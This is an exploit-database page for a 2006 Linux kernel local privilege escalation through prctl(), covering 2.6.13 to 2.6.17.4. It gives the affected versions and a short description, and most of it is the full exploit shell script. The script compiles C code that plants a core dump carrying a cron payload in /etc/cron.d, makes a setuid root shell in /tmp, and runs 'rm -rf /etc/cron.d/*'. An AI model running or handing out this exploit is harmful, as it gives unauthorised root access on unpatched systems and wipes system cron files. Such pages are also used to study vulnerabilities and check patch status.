PRCTL local root exp By: Sunix

vendor:

Linux Kernel

by:

Sunix

7,2

CVSS

HIGH

Local Privilege Escalation

264

CWE

Product Name: Linux Kernel

Affected Version From: 2.6.13

Affected Version To: 2.6.17.4, 2.6.9-22.ELsmp

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Intel(R) Xeon(TM) CPU 3.20GHz

2006

PRCTL local root exp By: Sunix

This exploit is a local privilege escalation vulnerability in the Linux kernel. It affects systems with kernel versions 2.6.13 to 2.6.17.4 and 2.6.9-22.ELsmp. The exploit uses the prctl() system call to set the dumpable flag to 2, which allows the attacker to create a core dump file of the process. The attacker then kills the process with a SIGSEGV signal, which causes the kernel to create a core dump file in the /etc/cron.d directory. The attacker then creates a cron job to execute a setuid shell in the /tmp directory. This allows the attacker to gain root privileges.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to a newer version of the Linux kernel.

Source

Exploit-DB raw data:

#!/bin/sh
#
# PRCTL local root exp By: Sunix
# + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp
# tested on Intel(R) Xeon(TM) CPU 3.20GHz
# kernel 2.6.9-22.ELsmp
# maybe others ...
# Tx to drayer & RoMaNSoFt for their clear code...
#
# zmia23@yahoo.com


cat > /tmp/getsuid.c << __EOF__
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * *   root   chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n";

int main() { 
    int child;
    struct rlimit corelimit;
    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);
    if ( !( child = fork() )) {
        chdir("/etc/cron.d");
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);
        exit(1);
    }
    kill(child, SIGSEGV);
    sleep(120);
}
__EOF__

cat > /tmp/s.c << __EOF__
#include<stdio.h>
main(void)
{
setgid(0);
setuid(0);
system("/bin/sh");
system("rm -rf /tmp/s");
system("rm -rf /etc/cron.d/*");
return 0;
}
__EOF__
echo "wait aprox 4 min to get sh"
cd /tmp
cc -o s s.c
cc -o getsuid getsuid.c
./getsuid
./s
rm -rf getsuid*
rm -rf s.c
rm -rf prctl.sh

# milw0rm.com [2006-07-14]